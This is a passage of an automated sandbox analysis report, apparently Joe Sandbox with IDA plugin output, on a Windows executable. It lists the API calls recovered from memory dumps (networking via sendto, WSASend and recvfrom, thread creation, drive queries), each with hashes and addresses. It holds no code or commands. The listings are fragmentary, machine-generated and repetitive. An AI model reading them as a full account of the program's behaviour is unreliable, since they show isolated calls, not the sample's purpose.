                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D242
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2251373460-0
                                                                                                                                                                                                                                                    • Opcode ID: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                                                                                                                                                    • Instruction ID: b4a3372add05cffca1b77c7dac60b50b4844df58a08520f3d20c10534500f2db
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f4ce32234228e51373a718084f49bdd165b62b4cc5873150e0a73e2794c4448
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B31D6B4A00209EFDB04DF98D889F9EBBB5FB48304F1081A8E905A7391D775EA95CF54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Sleep$CountTickrandsrand
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3488799664-0
                                                                                                                                                                                                                                                    • Opcode ID: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                                                                                                                                                                                                    • Instruction ID: b6b36855a0edcd25512206b50fb5473dda965f97846ebbbd8b428d1493e324f4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c117d04b20163f9f953f828aeedb65ed40a1637f383e1ba8009b9b023e8ebc44
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D21D875E04208FBD704DF60D8856AE7B31EB45304F10C47AED026B381DA79AA80DB56
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _allshl_aullshr
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 673498613-0
                                                                                                                                                                                                                                                    • Opcode ID: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                                                                                                                                                    • Instruction ID: 40a613cc88bb75a9b4956eb5c221db2524b4544d5556699ad57a8543b44bc28a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c741ae3234a389a253b0a23420a389dbca14ef940f6469a5e268d1ed8ccdf8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B111F32510518AB8B10EF6FC44268ABBD6EF843A1B25C136FC2CDF359D634DA514BD8
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00401281
                                                                                                                                                                                                                                                    • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                                                                    • String ID: pdu
                                                                                                                                                                                                                                                    • API String ID: 2164660128-2320407122
                                                                                                                                                                                                                                                    • Opcode ID: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                                                                                                                                                                                                    • Instruction ID: d4e165de5104959f260b85937ca272364f863e3dc64df769d8e1baf9f078371f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad0a036109145f249a08ec8e181f2c3f15924be3383878ad7f1db0ee6fe723d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5831A5762083009BC710DF69D884A9BBBE4AFC9714F04456EFD9897381D634D919C7E7
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 0040D429
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040D458
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0040D467
                                                                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0040D474
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 3102160386-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                                                                                                                                                                                                    • Instruction ID: 6cfc4b79706d1bba1c4fbc1f32f5c608acb329628ab24e105d00911b1e03cc11
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8282c1fc67bed24bc2a31477c864fcafb026bcbe456c45579f2b949671041cbb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC112D74D00208EFDB08DF94D984A9EBB75FF48309F2081A9E806AB341D734EE95DB95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                                                                                                                                                      • Part of subcall function 0040A1B0: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040A20B
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                                                                    • String ID: pdu$.ou
                                                                                                                                                                                                                                                    • API String ID: 309973729-2706015961
                                                                                                                                                                                                                                                    • Opcode ID: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                                                                                                                                                                                                    • Instruction ID: 8798272c393d99dde58c69795aa0ec1d050c8eff8ee51a61ed5db2294712bea8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c39a517e5d4f3b53a3b778486be7aa7f806f5e58db1bfdeefdb0bb5bfa2d2843
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 400186765003109BCB21AF55ECC4E9B7779AF48311B044679FD056B396C638E85487A5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                                                                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                                                                                                                                      • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                                                                      • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                                                                      • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3966618661-0
                                                                                                                                                                                                                                                    • Opcode ID: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                                                                                                                                                                                                    • Instruction ID: 5b2b6301c056c53cf24b756eb28b55477e9028745ee4fe4862f5ad68d4db2f6a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3b7509c36c549ccc631e3d4bc530e991b8502da243600c65769ed081249f64d8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1841B371604A02AFC714EB39D848797F7A4BF88310F14827EE82D933D1E735A855CB99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _allshl
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 435966717-0
                                                                                                                                                                                                                                                    • Opcode ID: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                                                                                                                                                    • Instruction ID: 2f682f979519ea9f46037cdaf014f1fa89077d02b7b0d9f1a8f9fce332e03f2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ce938123fd61f227b6de6a29a17a105f2c46d2c2b520e971cfa59f1b0e97cc1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62F03672A11419D79720EFFFD4424CAF7E59F88354B118676F818E3270E5709D1146F5
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(004062FF), ref: 0040632D
                                                                                                                                                                                                                                                    • QueryDosDeviceW.KERNEL32(004062FF,?,00000208), ref: 0040636C
                                                                                                                                                                                                                                                    • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 00406384
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DeviceDriveQueryType
                                                                                                                                                                                                                                                    • String ID: \??\
                                                                                                                                                                                                                                                    • API String ID: 1681518211-3047946824
                                                                                                                                                                                                                                                    • Opcode ID: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                                                                                                                                                    • Instruction ID: affcc5b958b6168f9f245bae438771e9e0bc574488939cd978d138ae5b874539
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ed414b0295d9b290f281463d65c6dfdef2d1200349873c82773e40805adb805
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4101ECB0A4020CEBCB20DF55DD496DEB7B5AB04704F01C0BAAA09A7280D6759AD5CF99
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,?), ref: 00407338
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00407370,00000000,00000000,00000000), ref: 0040735A
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00407361
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 2064604595-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
                                                                                                                                                                                                                                                    • Instruction ID: f93afe995e2a8aed0921a04be4342d20ba97acab7f8849ac526c8a5d2aa2879c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 025e05a46128585bda8c63f35f43421881db84198d69b8bbc1a6440a37f96729
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20F090B1A04308FBDB00DFA4EC46F9E7378BB48704F244468F908A73C1D675AA10CB59
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                                                                    • String ID: .ou
                                                                                                                                                                                                                                                    • API String ID: 1378416451-3683031111
                                                                                                                                                                                                                                                    • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                                                                    • Instruction ID: 089911091b4f8663884f4f3f40455582f6b765449e30803f2281244f10637e16
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDF0C074A40308FBEB20DFA4DC49FDDBB78EB04711F208695FA05BB2D0D6B56A918B54
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                                                                                                                                    • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3980219359-0
                                                                                                                                                                                                                                                    • Opcode ID: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                                                                                                                                                                                                    • Instruction ID: e1641215121ef27e00d374ead4771de002ae7678dd3977a0c2b5eb1dd4af8410
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9043bbde74ed34bf2cc191a38aea973bc9bd065bac7bbf52c4b9ffe402cd0893
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE21B1B11043016FD304DF65D884A6BB7E8AF88318F004A3EF559A6291E774D948C7AA
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                                                                                                                                    • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                                                                                                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2074799992-0
                                                                                                                                                                                                                                                    • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                                                                    • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                                                                                                                                                    • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3668019968-0
                                                                                                                                                                                                                                                    • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                                                                    • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                                                                                                                                    • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                                                                                                                                    • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429917329.0000000000414000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_400000_896429707.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2121970615-0
                                                                                                                                                                                                                                                    • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                                                                    • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1429884330.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429864004.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1429902924.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
